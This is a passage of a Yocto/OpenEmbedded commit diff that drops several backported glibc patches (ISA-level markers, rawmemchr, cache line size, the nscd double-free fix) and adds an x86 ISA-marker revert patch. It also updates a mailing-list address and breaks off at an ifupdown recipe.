diff --git a/meta/recipes-core/glibc/glibc/0031-x86-Require-full-ISA-support-for-x86-64-level-marker.patch b/meta/recipes-core/glibc/glibc/0031-x86-Require-full-ISA-support-for-x86-64-level-marker.patch
deleted file mode 100644
index 3cb60b2e55d..00000000000
--- a/meta/recipes-core/glibc/glibc/0031-x86-Require-full-ISA-support-for-x86-64-level-marker.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-From b1971f6f1331d738d1d6b376b4741668a7546125 Mon Sep 17 00:00:00 2001
-From: "H.J. Lu" <hjl.tools@gmail.com>
-Date: Tue, 2 Feb 2021 13:45:58 -0800
-Subject: [PATCH] x86: Require full ISA support for x86-64 level marker [BZ #27318]
-
-Since -march=sandybridge enables ISAs in x86-64 ISA level v3, the v3
-marker is set on libc.so. We couldn't set the needed ISA marker to v2
-since this libc won't run on all v2 machines. Technically, the v3 marker
-is correct. But the resulting libc.so won't run on Sandy Brigde, which
-is a v2 machine, even when libc is compiled with -march=sandybridge:
-
-$ ./elf/ld.so ./libc.so
-./libc.so: (p) CPU ISA level is lower than required: needed: 7; got: 3
-
-Instead, we require full ISA support for x86-64 level marker and disable
-x86-64 level marker for -march=sandybridge which enables ISAs between v2
-and v3.
-
-Upstream-Status: Submitted [https://sourceware.org/pipermail/libc-alpha/2021-February/122297.html]
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
----
-
- sysdeps/x86/configure | 7 ++++++-
- sysdeps/x86/configure.ac | 2 +-
- sysdeps/x86/isa-level.c | 21 ++++++++++++++++++++-
- 3 files changed, 27 insertions(+), 3 deletions(-)
-
-diff --git a/sysdeps/x86/configure b/sysdeps/x86/configure
-index 5e32dc62b3..5b20646843 100644
---- a/sysdeps/x86/configure
-+++ b/sysdeps/x86/configure
-@@ -133,7 +133,12 @@ if { ac_try='${CC-cc} $CFLAGS $CPPFLAGS -nostartfiles -nostdlib -r -o conftest c
- $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5
- test $ac_status = 0; }; }; then
- count=`LC_ALL=C $READELF -n conftest | grep NT_GNU_PROPERTY_TYPE_0 | wc -l`
-- if test "$count" = 1; then
-+ if test "$count" = 1 && { ac_try='${CC-cc} $CFLAGS $CPPFLAGS -DINCLUDE_X86_ISA_LEVEL -S -o conftest.s $srcdir/sysdeps/x86/isa-level.c'
-+ { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_try\""; } >&5
-+ (eval $ac_try) 2>&5
-+ ac_status=$?
-+ $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5
-+ test $ac_status = 0; }; }; then
- libc_cv_include_x86_isa_level=yes
- fi
- fi
-diff --git a/sysdeps/x86/configure.ac b/sysdeps/x86/configure.ac
-index f94088f377..54ecd33d2c 100644
---- a/sysdeps/x86/configure.ac
-+++ b/sysdeps/x86/configure.ac
-@@ -100,7 +100,7 @@ EOF
- libc_cv_include_x86_isa_level=no
- if AC_TRY_COMMAND(${CC-cc} $CFLAGS $CPPFLAGS -nostartfiles -nostdlib -r -o conftest conftest1.S conftest2.S); then
- count=`LC_ALL=C $READELF -n conftest | grep NT_GNU_PROPERTY_TYPE_0 | wc -l`
-- if test "$count" = 1; then
-+ if test "$count" = 1 && AC_TRY_COMMAND(${CC-cc} $CFLAGS $CPPFLAGS -DINCLUDE_X86_ISA_LEVEL -S -o conftest.s $srcdir/sysdeps/x86/isa-level.c); then
- libc_cv_include_x86_isa_level=yes
- fi
- fi
-diff --git a/sysdeps/x86/isa-level.c b/sysdeps/x86/isa-level.c
-index aaf524cb56..7f83449061 100644
---- a/sysdeps/x86/isa-level.c
-+++ b/sysdeps/x86/isa-level.c
-@@ -25,12 +25,17 @@
- License along with the GNU C Library; if not, see
- <https://www.gnu.org/licenses/>. */
-
--#include <elf.h>
-+#ifdef _LIBC
-+# include <elf.h>
-+#endif
-
- /* ELF program property for x86 ISA level. */
- #ifdef INCLUDE_X86_ISA_LEVEL
- # if defined __x86_64__ || defined __FXSR__ || !defined _SOFT_FLOAT \
- || defined __MMX__ || defined __SSE__ || defined __SSE2__
-+# if !defined __SSE__ || !defined __SSE2__
-+# error "Missing ISAs for x86-64 ISA level baseline"
-+# endif
- # define ISA_BASELINE GNU_PROPERTY_X86_ISA_1_BASELINE
- # else
- # define ISA_BASELINE 0
-@@ -40,6 +45,11 @@
- || (defined __x86_64__ && defined __LAHF_SAHF__) \
- || defined __POPCNT__ || defined __SSE3__ \
- || defined __SSSE3__ || defined __SSE4_1__ || defined __SSE4_2__
-+# if !defined __GCC_HAVE_SYNC_COMPARE_AND_SWAP_16 \
-+ || !defined __POPCNT__ || !defined __SSE3__ \
-+ || !defined __SSSE3__ || !defined __SSE4_1__ || !defined __SSE4_2__
-+# error "Missing ISAs for x86-64 ISA level v2"
-+# endif
- # define ISA_V2 GNU_PROPERTY_X86_ISA_1_V2
- # else
- # define ISA_V2 0
-@@ -48,6 +58,10 @@
- # if defined __AVX__ || defined __AVX2__ || defined __F16C__ \
- || defined __FMA__ || defined __LZCNT__ || defined __MOVBE__ \
- || defined __XSAVE__
-+# if !defined __AVX__ || !defined __AVX2__ || !defined __F16C__ \
-+ || !defined __FMA__ || !defined __LZCNT__
-+# error "Missing ISAs for x86-64 ISA level v3"
-+# endif
- # define ISA_V3 GNU_PROPERTY_X86_ISA_1_V3
- # else
- # define ISA_V3 0
-@@ -55,6 +69,11 @@
-
- # if defined __AVX512F__ || defined __AVX512BW__ || defined __AVX512CD__ \
- || defined __AVX512DQ__ || defined __AVX512VL__
-+# if !defined __AVX512F__ || !defined __AVX512BW__ \
-+ || !defined __AVX512CD__ || !defined __AVX512DQ__ \
-+ || !defined __AVX512VL__
-+# error "Missing ISAs for x86-64 ISA level v4"
-+# endif
- # define ISA_V4 GNU_PROPERTY_X86_ISA_1_V4
- # else
- # define ISA_V4 0
diff --git a/meta/recipes-core/glibc/glibc/0032-string-Work-around-GCC-PR-98512-in-rawmemchr.patch b/meta/recipes-core/glibc/glibc/0032-string-Work-around-GCC-PR-98512-in-rawmemchr.patch
deleted file mode 100644
index e904b28a055..00000000000
--- a/meta/recipes-core/glibc/glibc/0032-string-Work-around-GCC-PR-98512-in-rawmemchr.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From 044e603b698093cf48f6e6229e0b66acf05227e4 Mon Sep 17 00:00:00 2001
-From: Florian Weimer <fweimer@redhat.com>
-Date: Fri, 19 Feb 2021 13:29:00 +0100
-Subject: [PATCH] string: Work around GCC PR 98512 in rawmemchr
-
-Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=044e603b698093cf48f6e6229e0b66acf05227e4]
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
----
- string/rawmemchr.c | 26 +++++++++++++++-----------
- 1 file changed, 15 insertions(+), 11 deletions(-)
-
-diff --git a/string/rawmemchr.c b/string/rawmemchr.c
-index 59bbeeaa42..b8523118e5 100644
---- a/string/rawmemchr.c
-+++ b/string/rawmemchr.c
-@@ -22,24 +22,28 @@
- # define RAWMEMCHR __rawmemchr
- #endif
-
--/* Find the first occurrence of C in S. */
--void *
--RAWMEMCHR (const void *s, int c)
--{
-- DIAG_PUSH_NEEDS_COMMENT;
-+/* The pragmata should be nested inside RAWMEMCHR below, but that
-+ triggers GCC PR 98512. */
-+DIAG_PUSH_NEEDS_COMMENT;
- #if __GNUC_PREREQ (7, 0)
-- /* GCC 8 warns about the size passed to memchr being larger than
-- PTRDIFF_MAX; the use of SIZE_MAX is deliberate here. */
-- DIAG_IGNORE_NEEDS_COMMENT (8, "-Wstringop-overflow=");
-+/* GCC 8 warns about the size passed to memchr being larger than
-+ PTRDIFF_MAX; the use of SIZE_MAX is deliberate here. */
-+DIAG_IGNORE_NEEDS_COMMENT (8, "-Wstringop-overflow=");
- #endif
- #if __GNUC_PREREQ (11, 0)
-- /* Likewise GCC 11, with a different warning option. */
-- DIAG_IGNORE_NEEDS_COMMENT (11, "-Wstringop-overread");
-+/* Likewise GCC 11, with a different warning option. */
-+DIAG_IGNORE_NEEDS_COMMENT (11, "-Wstringop-overread");
- #endif
-+
-+/* Find the first occurrence of C in S. */
-+void *
-+RAWMEMCHR (const void *s, int c)
-+{
- if (c != '\0')
- return memchr (s, c, (size_t)-1);
-- DIAG_POP_NEEDS_COMMENT;
- return (char *)s + strlen (s);
- }
- libc_hidden_def (__rawmemchr)
- weak_alias (__rawmemchr, rawmemchr)
-+
-+DIAG_POP_NEEDS_COMMENT;
---
-2.30.1
-
diff --git a/meta/recipes-core/glibc/glibc/0033-x86-Handle-_SC_LEVEL1_ICACHE_LINESIZE-BZ-27444.patch b/meta/recipes-core/glibc/glibc/0033-x86-Handle-_SC_LEVEL1_ICACHE_LINESIZE-BZ-27444.patch
deleted file mode 100644
index 3a004e227fe..00000000000
--- a/meta/recipes-core/glibc/glibc/0033-x86-Handle-_SC_LEVEL1_ICACHE_LINESIZE-BZ-27444.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From 750b00a1ddae220403fd892a6fd4e0791ffd154a Mon Sep 17 00:00:00 2001
-From: "H.J. Lu" <hjl.tools@gmail.com>
-Date: Fri, 18 Sep 2020 07:55:14 -0700
-Subject: [PATCH] x86: Handle _SC_LEVEL1_ICACHE_LINESIZE [BZ #27444]
-
- x86: Move x86 processor cache info to cpu_features
-
-missed _SC_LEVEL1_ICACHE_LINESIZE.
-
-1. Add level1_icache_linesize to struct cpu_features.
-2. Initialize level1_icache_linesize by calling handle_intel,
-handle_zhaoxin and handle_amd with _SC_LEVEL1_ICACHE_LINESIZE.
-3. Return level1_icache_linesize for _SC_LEVEL1_ICACHE_LINESIZE.
-
-Upstream-Status: Backport [https://sourceware.org/bugzilla/show_bug.cgi?id=27444]
-Signed-off-by: Andrei Gherzan <andrei.gherzan@huawei.com>
----
- sysdeps/x86/Makefile | 8 +++
- sysdeps/x86/cacheinfo.c | 3 +
- sysdeps/x86/dl-cacheinfo.h | 6 ++
- sysdeps/x86/include/cpu-features.h | 2 +
- .../x86/tst-sysconf-cache-linesize-static.c | 1 +
- sysdeps/x86/tst-sysconf-cache-linesize.c | 57 +++++++++++++++++++
- 6 files changed, 77 insertions(+)
- create mode 100644 sysdeps/x86/tst-sysconf-cache-linesize-static.c
- create mode 100644 sysdeps/x86/tst-sysconf-cache-linesize.c
-
-diff --git a/sysdeps/x86/Makefile b/sysdeps/x86/Makefile
-index dd82674342..d231263051 100644
---- a/sysdeps/x86/Makefile
-+++ b/sysdeps/x86/Makefile
-@@ -208,3 +208,11 @@ $(objpfx)check-cet.out: $(..)sysdeps/x86/check-cet.awk \
- generated += check-cet.out
- endif
- endif
-+
-+ifeq ($(subdir),posix)
-+tests += \
-+ tst-sysconf-cache-linesize \
-+ tst-sysconf-cache-linesize-static
-+tests-static += \
-+ tst-sysconf-cache-linesize-static
-+endif
-diff --git a/sysdeps/x86/cacheinfo.c b/sysdeps/x86/cacheinfo.c
-index 7b8df45e3b..5ea4723ca6 100644
---- a/sysdeps/x86/cacheinfo.c
-+++ b/sysdeps/x86/cacheinfo.c
-@@ -32,6 +32,9 @@ __cache_sysconf (int name)
- case _SC_LEVEL1_ICACHE_SIZE:
- return cpu_features->level1_icache_size;
-
-+ case _SC_LEVEL1_ICACHE_LINESIZE:
-+ return cpu_features->level1_icache_linesize;
-+
- case _SC_LEVEL1_DCACHE_SIZE:
- return cpu_features->level1_dcache_size;
-
-diff --git a/sysdeps/x86/dl-cacheinfo.h b/sysdeps/x86/dl-cacheinfo.h
-index a31fa0783a..7cd00b92f1 100644
---- a/sysdeps/x86/dl-cacheinfo.h
-+++ b/sysdeps/x86/dl-cacheinfo.h
-@@ -707,6 +707,7 @@ dl_init_cacheinfo (struct cpu_features *cpu_features)
- long int core;
- unsigned int threads = 0;
- unsigned long int level1_icache_size = -1;
-+ unsigned long int level1_icache_linesize = -1;
- unsigned long int level1_dcache_size = -1;
- unsigned long int level1_dcache_assoc = -1;
- unsigned long int level1_dcache_linesize = -1;
-@@ -726,6 +727,8 @@ dl_init_cacheinfo (struct cpu_features *cpu_features)
-
- level1_icache_size
- = handle_intel (_SC_LEVEL1_ICACHE_SIZE, cpu_features);
-+ level1_icache_linesize
-+ = handle_intel (_SC_LEVEL1_ICACHE_LINESIZE, cpu_features);
- level1_dcache_size = data;
- level1_dcache_assoc
- = handle_intel (_SC_LEVEL1_DCACHE_ASSOC, cpu_features);
-@@ -753,6 +756,7 @@ dl_init_cacheinfo (struct cpu_features *cpu_features)
- shared = handle_zhaoxin (_SC_LEVEL3_CACHE_SIZE);
-
- level1_icache_size = handle_zhaoxin (_SC_LEVEL1_ICACHE_SIZE);
-+ level1_icache_linesize = handle_zhaoxin (_SC_LEVEL1_ICACHE_LINESIZE);
- level1_dcache_size = data;
- level1_dcache_assoc = handle_zhaoxin (_SC_LEVEL1_DCACHE_ASSOC);
- level1_dcache_linesize = handle_zhaoxin (_SC_LEVEL1_DCACHE_LINESIZE);
-@@ -772,6 +776,7 @@ dl_init_cacheinfo (struct cpu_features *cpu_features)
- shared = handle_amd (_SC_LEVEL3_CACHE_SIZE);
-
- level1_icache_size = handle_amd (_SC_LEVEL1_ICACHE_SIZE);
-+ level1_icache_linesize = handle_amd (_SC_LEVEL1_ICACHE_LINESIZE);
- level1_dcache_size = data;
- level1_dcache_assoc = handle_amd (_SC_LEVEL1_DCACHE_ASSOC);
- level1_dcache_linesize = handle_amd (_SC_LEVEL1_DCACHE_LINESIZE);
-@@ -833,6 +838,7 @@ dl_init_cacheinfo (struct cpu_features *cpu_features)
- }
-
- cpu_features->level1_icache_size = level1_icache_size;
-+ cpu_features->level1_icache_linesize = level1_icache_linesize;
- cpu_features->level1_dcache_size = level1_dcache_size;
- cpu_features->level1_dcache_assoc = level1_dcache_assoc;
- cpu_features->level1_dcache_linesize = level1_dcache_linesize;
-diff --git a/sysdeps/x86/include/cpu-features.h b/sysdeps/x86/include/cpu-features.h
-index 624736b40e..39a3f4f311 100644
---- a/sysdeps/x86/include/cpu-features.h
-+++ b/sysdeps/x86/include/cpu-features.h
-@@ -874,6 +874,8 @@ struct cpu_features
- unsigned long int rep_stosb_threshold;
- /* _SC_LEVEL1_ICACHE_SIZE. */
- unsigned long int level1_icache_size;
-+ /* _SC_LEVEL1_ICACHE_LINESIZE. */
-+ unsigned long int level1_icache_linesize;
- /* _SC_LEVEL1_DCACHE_SIZE. */
- unsigned long int level1_dcache_size;
- /* _SC_LEVEL1_DCACHE_ASSOC. */
-diff --git a/sysdeps/x86/tst-sysconf-cache-linesize-static.c b/sysdeps/x86/tst-sysconf-cache-linesize-static.c
-new file mode 100644
-index 0000000000..152ae68821
---- /dev/null
-+++ b/sysdeps/x86/tst-sysconf-cache-linesize-static.c
-@@ -0,0 +1 @@
-+#include "tst-sysconf-cache-linesize.c"
-diff --git a/sysdeps/x86/tst-sysconf-cache-linesize.c b/sysdeps/x86/tst-sysconf-cache-linesize.c
-new file mode 100644
-index 0000000000..642dbde5d2
---- /dev/null
-+++ b/sysdeps/x86/tst-sysconf-cache-linesize.c
-@@ -0,0 +1,57 @@
-+/* Test system cache line sizes.
-+ Copyright (C) 2021 Free Software Foundation, Inc.
-+ This file is part of the GNU C Library.
-+
-+ The GNU C Library is free software; you can redistribute it and/or
-+ modify it under the terms of the GNU Lesser General Public
-+ License as published by the Free Software Foundation; either
-+ version 2.1 of the License, or (at your option) any later version.
-+
-+ The GNU C Library is distributed in the hope that it will be useful,
-+ but WITHOUT ANY WARRANTY; without even the implied warranty of
-+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-+ Lesser General Public License for more details.
-+
-+ You should have received a copy of the GNU Lesser General Public
-+ License along with the GNU C Library; if not, see
-+ <https://www.gnu.org/licenses/>. */
-+
-+#include <stdio.h>
-+#include <stdlib.h>
-+#include <unistd.h>
-+#include <array_length.h>
-+
-+static struct
-+{
-+ const char *name;
-+ int _SC_val;
-+} sc_options[] =
-+ {
-+#define N(name) { "_SC_"#name, _SC_##name }
-+ N (LEVEL1_ICACHE_LINESIZE),
-+ N (LEVEL1_DCACHE_LINESIZE),
-+ N (LEVEL2_CACHE_LINESIZE)
-+ };
-+
-+static int
-+do_test (void)
-+{
-+ int result = EXIT_SUCCESS;
-+
-+ for (int i = 0; i < array_length (sc_options); ++i)
-+ {
-+ long int scret = sysconf (sc_options[i]._SC_val);
-+ if (scret < 0)
-+ {
-+ printf ("sysconf (%s) returned < 0 (%ld)\n",
-+ sc_options[i].name, scret);
-+ result = EXIT_FAILURE;
-+ }
-+ else
-+ printf ("sysconf (%s): %ld\n", sc_options[i].name, scret);
-+ }
-+
-+ return result;
-+}
-+
-+#include <support/test-driver.c>
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-27318-revert.patch b/meta/recipes-core/glibc/glibc/CVE-2021-27318-revert.patch
new file mode 100644
index 00000000000..2f08a90dd08
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2021-27318-revert.patch
@@ -0,0 +1,174 @@
+Since the full ISA set used in an ELF binary is unknown to compiler,
+an x86-64 ISA level marker indicates the minimum, not maximum, ISA set
+required to run such an ELF binary. We never guarantee a library with
+an x86-64 ISA level v3 marker doesn't contain other ISAs beyond x86-64
+ISA level v3, like AVX VNNI. We check the x86-64 ISA level marker for
+the minimum ISA set. Since -march=sandybridge enables only some ISAs
+in x86-64 ISA level v3, we should set the needed ISA marker to v2.
+Otherwise, libc is compiled with -march=sandybridge will fail to run on
+Sandy Bridge:
+
+$ ./elf/ld.so ./libc.so
+./libc.so: (p) CPU ISA level is lower than required: needed: 7; got: 3
+
+Set the minimum, instead of maximum, x86-64 ISA level marker should have
+no impact on the b-hwcaps directory assignment logic in ldconfig nor
+ld.so.
+
+(cherry picked from commit 339bf918ea4830fb35614632e96f3aab3237adce)
+---
+ config.h.in | 6 ++++++
+ sysdeps/x86/configure | 28 ++++++++++++++++++++++++++++
+ sysdeps/x86/configure.ac | 16 ++++++++++++++++
+ sysdeps/x86/isa-level.c | 25 ++++++++++++++-----------
+ 4 files changed, 64 insertions(+), 11 deletions(-)
+
+diff --git a/config.h.in b/config.h.in
+--- a/config.h.in 2021-10-16 03:28:49.447573081 -0700
++++ b/config.h.in 2021-10-16 03:29:38.626741181 -0700
+@@ -275,4 +275,10 @@
+ /* Define if x86 ISA level should be included in shared libraries. */
+ #undef INCLUDE_X86_ISA_LEVEL
+
++/* Define if -msahf is enabled by default on x86. */
++#undef HAVE_X86_LAHF_SAHF
++
++/* Define if -mmovbe is enabled by default on x86. */
++#undef HAVE_X86_MOVBE
++
+ #endif
+diff --git a/sysdeps/x86/configure b/sysdeps/x86/configure
+--- a/sysdeps/x86/configure 2021-10-16 03:28:49.587570713 -0700
++++ b/sysdeps/x86/configure 2021-10-16 03:29:39.330729277 -0700
+@@ -126,6 +126,8 @@ cat > conftest2.S <<EOF
+ 4:
+ EOF
+ libc_cv_include_x86_isa_level=no
++libc_cv_have_x86_lahf_sahf=no
++libc_cv_have_x86_movbe=no
+ if { ac_try='${CC-cc} $CFLAGS $CPPFLAGS -nostartfiles -nostdlib -r -o conftest conftest1.S conftest2.S'
+ { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_try\""; } >&5
+ (eval $ac_try) 2>&5
+@@ -135,6 +137,24 @@ if { ac_try='${CC-cc} $CFLAGS $CPPFLAGS
+ count=`LC_ALL=C $READELF -n conftest | grep NT_GNU_PROPERTY_TYPE_0 | wc -l`
+ if test "$count" = 1; then
+ libc_cv_include_x86_isa_level=yes
++ cat > conftest.c <<EOF
++EOF
++ if { ac_try='${CC-cc} $CFLAGS $CPPFLAGS -fverbose-asm -S -o - conftest.c'
++ { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_try\""; } >&5
++ (eval $ac_try) 2>&5
++ ac_status=$?
++ $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5
++ test $ac_status = 0; }; } | grep -q "\-msahf"; then
++ libc_cv_have_x86_lahf_sahf=yes
++ fi
++ if { ac_try='${CC-cc} $CFLAGS $CPPFLAGS -fverbose-asm -S -o - conftest.c'
++ { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_try\""; } >&5
++ (eval $ac_try) 2>&5
++ ac_status=$?
++ $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5
++ test $ac_status = 0; }; } | grep -q "\-mmovbe"; then
++ libc_cv_have_x86_movbe=yes
++ fi
+ fi
+ fi
+ rm -f conftest*
+@@ -145,5 +165,13 @@ if test $libc_cv_include_x86_isa_level =
+ $as_echo "#define INCLUDE_X86_ISA_LEVEL 1" >>confdefs.h
+
+ fi
++if test $libc_cv_have_x86_lahf_sahf = yes; then
++ $as_echo "#define HAVE_X86_LAHF_SAHF 1" >>confdefs.h
++
++fi
++if test $libc_cv_have_x86_movbe = yes; then
++ $as_echo "#define HAVE_X86_MOVBE 1" >>confdefs.h
++
++fi
+ config_vars="$config_vars
+ enable-x86-isa-level = $libc_cv_include_x86_isa_level"
+diff --git a/sysdeps/x86/configure.ac b/sysdeps/x86/configure.ac
+--- a/sysdeps/x86/configure.ac 2021-10-16 03:28:49.587570713 -0700
++++ b/sysdeps/x86/configure.ac 2021-10-16 03:29:40.038717306 -0700
+@@ -98,14 +98,30 @@ cat > conftest2.S <<EOF
+ 4:
+ EOF
+ libc_cv_include_x86_isa_level=no
++libc_cv_have_x86_lahf_sahf=no
++libc_cv_have_x86_movbe=no
+ if AC_TRY_COMMAND(${CC-cc} $CFLAGS $CPPFLAGS -nostartfiles -nostdlib -r -o conftest conftest1.S conftest2.S); then
+ count=`LC_ALL=C $READELF -n conftest | grep NT_GNU_PROPERTY_TYPE_0 | wc -l`
+ if test "$count" = 1; then
+ libc_cv_include_x86_isa_level=yes
++ cat > conftest.c <<EOF
++EOF
++ if AC_TRY_COMMAND(${CC-cc} $CFLAGS $CPPFLAGS -fverbose-asm -S -o - conftest.c) | grep -q "\-msahf"; then
++ libc_cv_have_x86_lahf_sahf=yes
++ fi
++ if AC_TRY_COMMAND(${CC-cc} $CFLAGS $CPPFLAGS -fverbose-asm -S -o - conftest.c) | grep -q "\-mmovbe"; then
++ libc_cv_have_x86_movbe=yes
++ fi
+ fi
+ fi
+ rm -f conftest*])
+ if test $libc_cv_include_x86_isa_level = yes; then
+ AC_DEFINE(INCLUDE_X86_ISA_LEVEL)
+ fi
++if test $libc_cv_have_x86_lahf_sahf = yes; then
++ AC_DEFINE(HAVE_X86_LAHF_SAHF)
++fi
++if test $libc_cv_have_x86_movbe = yes; then
++ AC_DEFINE(HAVE_X86_MOVBE)
++fi
+ LIBC_CONFIG_VAR([enable-x86-isa-level], [$libc_cv_include_x86_isa_level])
+diff --git a/sysdeps/x86/isa-level.c b/sysdeps/x86/isa-level.c
+--- a/sysdeps/x86/isa-level.c 2021-10-16 03:28:49.587570713 -0700
++++ b/sysdeps/x86/isa-level.c 2021-10-16 03:29:40.766704997 -0700
+@@ -29,32 +29,35 @@
+
+ /* ELF program property for x86 ISA level. */
+ #ifdef INCLUDE_X86_ISA_LEVEL
+-# if defined __x86_64__ || defined __FXSR__ || !defined _SOFT_FLOAT \
+- || defined __MMX__ || defined __SSE__ || defined __SSE2__
++# if defined __SSE__ && defined __SSE2__
++/* NB: ISAs, excluding MMX, in x86-64 ISA level baseline are used. */
+ # define ISA_BASELINE GNU_PROPERTY_X86_ISA_1_BASELINE
+ # else
+ # define ISA_BASELINE 0
+ # endif
+
+-# if defined __GCC_HAVE_SYNC_COMPARE_AND_SWAP_16 \
+- || (defined __x86_64__ && defined __LAHF_SAHF__) \
+- || defined __POPCNT__ || defined __SSE3__ \
+- || defined __SSSE3__ || defined __SSE4_1__ || defined __SSE4_2__
++# if ISA_BASELINE && defined __GCC_HAVE_SYNC_COMPARE_AND_SWAP_16 \
++ && defined HAVE_X86_LAHF_SAHF && defined __POPCNT__ \
++ && defined __SSE3__ && defined __SSSE3__ && defined __SSE4_1__ \
++ && defined __SSE4_2__
++/* NB: ISAs in x86-64 ISA level v2 are used. */
+ # define ISA_V2 GNU_PROPERTY_X86_ISA_1_V2
+ # else
+ # define ISA_V2 0
+ # endif
+
+-# if defined __AVX__ || defined __AVX2__ || defined __F16C__ \
+- || defined __FMA__ || defined __LZCNT__ || defined __MOVBE__ \
+- || defined __XSAVE__
++# if ISA_V2 && defined __AVX__ && defined __AVX2__ && defined __F16C__ \
++ && defined __FMA__ && defined __LZCNT__ && defined HAVE_X86_MOVBE
++/* NB: ISAs in x86-64 ISA level v3 are used. */
+ # define ISA_V3 GNU_PROPERTY_X86_ISA_1_V3
+ # else
+ # define ISA_V3 0
+ # endif
+
+-# if defined __AVX512F__ || defined __AVX512BW__ || defined __AVX512CD__ \
+- || defined __AVX512DQ__ || defined __AVX512VL__
++# if ISA_V3 && defined __AVX512F__ && defined __AVX512BW__ \
++ && defined __AVX512CD__ && defined __AVX512DQ__ \
++ && defined __AVX512VL__
++/* NB: ISAs in x86-64 ISA level v4 are used. */
+ # define ISA_V4 GNU_PROPERTY_X86_ISA_1_V4
+ # else
+ # define ISA_V4 0
diff --git a/meta/recipes-core/glibc/glibc/CVE-2021-27645.patch b/meta/recipes-core/glibc/glibc/CVE-2021-27645.patch
deleted file mode 100644
index 26c5c0d2a96..00000000000
--- a/meta/recipes-core/glibc/glibc/CVE-2021-27645.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From dca565886b5e8bd7966e15f0ca42ee5cff686673 Mon Sep 17 00:00:00 2001
-From: DJ Delorie <dj@redhat.com>
-Date: Thu, 25 Feb 2021 16:08:21 -0500
-Subject: [PATCH] nscd: Fix double free in netgroupcache [BZ #27462]
-
-In commit 745664bd798ec8fd50438605948eea594179fba1 a use-after-free
-was fixed, but this led to an occasional double-free. This patch
-tracks the "live" allocation better.
-
-Tested manually by a third party.
-
-Related: RHBZ 1927877
-
-Reviewed-by: Siddhesh Poyarekar <siddhesh@sourceware.org>
-Reviewed-by: Carlos O'Donell <carlos@redhat.com>
-
-Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=commit;h=dca565886b5e8bd7966e15f0ca42ee5cff686673]
-
-CVE: CVE-2021-27645
-
-Reviewed-by: Carlos O'Donell <carlos@redhat.com>
-Signed-off-by: Khairul Rohaizzat Jamaluddin <khairul.rohaizzat.jamaluddin@intel.com>
----
- nscd/netgroupcache.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/nscd/netgroupcache.c b/nscd/netgroupcache.c
-index dba6ceec1b..ad2daddafd 100644
---- a/nscd/netgroupcache.c
-+++ b/nscd/netgroupcache.c
-@@ -248,7 +248,7 @@ addgetnetgrentX (struct database_dyn *db, int fd, request_header *req,
- : NULL);
- ndomain = (ndomain ? newbuf + ndomaindiff
- : NULL);
-- buffer = newbuf;
-+ *tofreep = buffer = newbuf;
- }
-
- nhost = memcpy (buffer + bufused,
-@@ -319,7 +319,7 @@ addgetnetgrentX (struct database_dyn *db, int fd, request_header *req,
- else if (status == NSS_STATUS_TRYAGAIN && e == ERANGE)
- {
- buflen *= 2;
-- buffer = xrealloc (buffer, buflen);
-+ *tofreep = buffer = xrealloc (buffer, buflen);
- }
- else if (status == NSS_STATUS_RETURN
- || status == NSS_STATUS_NOTFOUND
---
-2.27.0
-
diff --git a/meta/recipes-core/glibc/glibc_2.33.bb b/meta/recipes-core/glibc/glibc_2.33.bb
index 75a1f36d6bf..ad5e2b8eb1c 100644
--- a/meta/recipes-core/glibc/glibc_2.33.bb
+++ b/meta/recipes-core/glibc/glibc_2.33.bb
@@ -56,11 +56,6 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
file://0028-readlib-Add-OECORE_KNOWN_INTERPRETER_NAMES-to-known-.patch \
file://0029-wordsize.h-Unify-the-header-between-arm-and-aarch64.patch \
file://0030-powerpc-Do-not-ask-compiler-for-finding-arch.patch \
- file://0031-x86-Require-full-ISA-support-for-x86-64-level-marker.patch \
- file://0032-string-Work-around-GCC-PR-98512-in-rawmemchr.patch \
- file://0033-x86-Handle-_SC_LEVEL1_ICACHE_LINESIZE-BZ-27444.patch \
- file://CVE-2021-27645.patch \
- file://0001-nptl-Remove-private-futex-optimization-BZ-27304.patch \
"
S = "${WORKDIR}/git"
B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c79..d1835c7a108 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
return 0;
}
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
/* Print bug-reporting information in the help message. */
static char *
more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.36.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.36.bb
index 0daf50acab5..afc3196620c 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.36.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.36.bb
@@ -7,7 +7,7 @@ the file /etc/network/interfaces."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
